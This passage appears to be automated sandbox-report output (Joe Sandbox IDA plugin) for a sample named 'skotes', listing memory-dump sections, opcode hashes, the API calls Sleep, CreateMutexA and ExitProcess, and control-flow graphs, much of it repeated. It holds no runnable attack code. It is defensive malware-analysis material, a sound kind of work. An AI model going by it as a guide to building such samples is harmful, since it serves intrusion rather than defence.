                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792102810.0000000000C02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792125104.0000000000C06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792144006.0000000000C07000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792163338.0000000000C0D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792180756.0000000000C0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792199698.0000000000C12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792227341.0000000000C1B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792259364.0000000000C1F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792278648.0000000000C20000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792297712.0000000000C26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792319647.0000000000C37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792337408.0000000000C39000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792337408.0000000000C77000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792391387.0000000000C8E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792409014.0000000000C90000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792427117.0000000000CA5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792444652.0000000000CA6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792460735.0000000000CA7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792477407.0000000000CAD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792493264.0000000000CAF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792511468.0000000000CBC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792527724.0000000000CBD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9a0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ExitProcess
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 621844428-0
                                                                                                                                                                                                                                                                • Opcode ID: dcc8cc19ac10dc6b3d0f479ef99fed2c643fe36b9ff44ba63fb22faf800916b7
                                                                                                                                                                                                                                                                • Instruction ID: cbc40f800a8bff10f1bb63e54fb09e7342020953599656e33b0e401e20f98823
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dcc8cc19ac10dc6b3d0f479ef99fed2c643fe36b9ff44ba63fb22faf800916b7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8FE08C31181148AFCF26BF58D80DE483B6AEFA1781F008811F9145A326CB26DE82CA80

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 009AA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00A03254), ref: 009AA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1790996035.00000000009A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1790974553.00000000009A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1790996035.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791067167.0000000000A09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791090928.0000000000A0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791115091.0000000000A15000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791135228.0000000000A16000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791158600.0000000000A17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791284604.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791307160.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791335629.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791335629.0000000000B99000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791412229.0000000000B9C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791505830.0000000000B9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791548713.0000000000B9E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791584418.0000000000B9F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791648758.0000000000BA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791679936.0000000000BA2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791787783.0000000000BB4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791811526.0000000000BB5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791885454.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791991438.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792012579.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792035923.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792055022.0000000000BD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792074833.0000000000BDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792102810.0000000000C02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792125104.0000000000C06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792144006.0000000000C07000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792163338.0000000000C0D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792180756.0000000000C0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792199698.0000000000C12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792227341.0000000000C1B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792259364.0000000000C1F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792278648.0000000000C20000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792297712.0000000000C26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792319647.0000000000C37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792337408.0000000000C39000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792337408.0000000000C77000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792391387.0000000000C8E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792409014.0000000000C90000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792427117.0000000000CA5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792444652.0000000000CA6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792460735.0000000000CA7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792477407.0000000000CAD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792493264.0000000000CAF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792511468.0000000000CBC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792527724.0000000000CBD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9a0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: 537a3bdb0f0b22bb3ad4caeadc4440a7e5484cfdaba4fd719b15cebf2d769a72
                                                                                                                                                                                                                                                                • Instruction ID: 62df2d40bdcef634ffb27f3aef92814c13be4eaee6f163af8266a292883fbc04
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 537a3bdb0f0b22bb3ad4caeadc4440a7e5484cfdaba4fd719b15cebf2d769a72
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C4312A317042059BEB08DB7CDD897AEB7B6EBD7324F248218E058973D6C7768981CB91

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 22 9a9f44-9a9f64 26 9a9f92-9a9fae 22->26 27 9a9f66-9a9f72 22->27 30 9a9fdc-9a9ffb 26->30 31 9a9fb0-9a9fbc 26->31 28 9a9f88-9a9f8f call 9bd663 27->28 29 9a9f74-9a9f82 27->29 28->26 29->28 34 9aa92b 29->34 32 9aa029-9aa916 call 9b80c0 30->32 33 9a9ffd-9aa009 30->33 36 9a9fbe-9a9fcc 31->36 37 9a9fd2-9a9fd9 call 9bd663 31->37 39 9aa00b-9aa019 33->39 40 9aa01f-9aa026 call 9bd663 33->40 42 9aa953-9aa994 Sleep CreateMutexA 34->42 43 9aa92b call 9d6c6a 34->43 36->34 36->37 37->30 39->34 39->40 40->32 51 9aa996-9aa998 42->51 52 9aa9a7-9aa9a8 42->52 43->42 51->52 54 9aa99a-9aa9a5 51->54 54->52
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 009AA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00A03254), ref: 009AA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1790996035.00000000009A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1790974553.00000000009A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1790996035.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791067167.0000000000A09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791090928.0000000000A0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791115091.0000000000A15000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791135228.0000000000A16000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791158600.0000000000A17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791284604.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791307160.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791335629.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791335629.0000000000B99000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791412229.0000000000B9C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791505830.0000000000B9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791548713.0000000000B9E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791584418.0000000000B9F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791648758.0000000000BA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791679936.0000000000BA2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791787783.0000000000BB4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791811526.0000000000BB5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791885454.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791991438.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792012579.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792035923.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792055022.0000000000BD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792074833.0000000000BDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792102810.0000000000C02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792125104.0000000000C06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792144006.0000000000C07000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792163338.0000000000C0D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792180756.0000000000C0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792199698.0000000000C12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792227341.0000000000C1B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792259364.0000000000C1F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792278648.0000000000C20000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792297712.0000000000C26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792319647.0000000000C37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792337408.0000000000C39000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792337408.0000000000C77000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792391387.0000000000C8E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792409014.0000000000C90000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792427117.0000000000CA5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792444652.0000000000CA6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792460735.0000000000CA7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792477407.0000000000CAD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792493264.0000000000CAF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792511468.0000000000CBC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792527724.0000000000CBD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9a0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: 946ae94a65f58c5b89745f407ef21e2754e9ece8bdb1ded5fb6d9ccc0f80f297
                                                                                                                                                                                                                                                                • Instruction ID: 2e8ebe4017818aad940e06dbeae96eacd0fa872b331ad6c74720b56d4fd8a56a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 946ae94a65f58c5b89745f407ef21e2754e9ece8bdb1ded5fb6d9ccc0f80f297
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 923148317002058BEB18DB7CDD887ADB766EBCB310F208618E018EB2D5D7768981CB92

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 56 9aa079-9aa099 60 9aa09b-9aa0a7 56->60 61 9aa0c7-9aa0e3 56->61 62 9aa0a9-9aa0b7 60->62 63 9aa0bd-9aa0c4 call 9bd663 60->63 64 9aa111-9aa130 61->64 65 9aa0e5-9aa0f1 61->65 62->63 68 9aa930 62->68 63->61 66 9aa15e-9aa916 call 9b80c0 64->66 67 9aa132-9aa13e 64->67 70 9aa0f3-9aa101 65->70 71 9aa107-9aa10e call 9bd663 65->71 72 9aa140-9aa14e 67->72 73 9aa154-9aa15b call 9bd663 67->73 76 9aa953-9aa994 Sleep CreateMutexA 68->76 77 9aa930 call 9d6c6a 68->77 70->68 70->71 71->64 72->68 72->73 73->66 85 9aa996-9aa998 76->85 86 9aa9a7-9aa9a8 76->86 77->76 85->86 88 9aa99a-9aa9a5 85->88 88->86
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 009AA963
                                                                                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00A03254), ref: 009AA981
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1790996035.00000000009A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1790974553.00000000009A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1790996035.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791067167.0000000000A09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791090928.0000000000A0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791115091.0000000000A15000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791135228.0000000000A16000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791158600.0000000000A17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791284604.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791307160.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791335629.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791335629.0000000000B99000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791412229.0000000000B9C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791505830.0000000000B9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791548713.0000000000B9E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791584418.0000000000B9F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791648758.0000000000BA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791679936.0000000000BA2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791787783.0000000000BB4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791811526.0000000000BB5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791885454.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791991438.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792012579.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792035923.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792055022.0000000000BD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792074833.0000000000BDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792102810.0000000000C02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792125104.0000000000C06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792144006.0000000000C07000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792163338.0000000000C0D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792180756.0000000000C0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792199698.0000000000C12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792227341.0000000000C1B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792259364.0000000000C1F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792278648.0000000000C20000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792297712.0000000000C26000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792319647.0000000000C37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792337408.0000000000C39000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792337408.0000000000C77000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792391387.0000000000C8E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792409014.0000000000C90000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792427117.0000000000CA5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792444652.0000000000CA6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792460735.0000000000CA7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792477407.0000000000CAD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792493264.0000000000CAF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792511468.0000000000CBC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792527724.0000000000CBD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_9a0000_skotes.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                • Opcode ID: e83423e4373600a64d5a22e91ecbc6a2bdb4fb8d3445bb7eebbcd98e717368f2
                                                                                                                                                                                                                                                                • Instruction ID: 5f8ac7db76ad85912a2f193c20baa9ed52d30c5d403200705135ae4386301adf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e83423e4373600a64d5a22e91ecbc6a2bdb4fb8d3445bb7eebbcd98e717368f2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9A3148317042059BEB08DB7CCD89BADB776DBCB314F208219E018973D1C7769981CB92

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
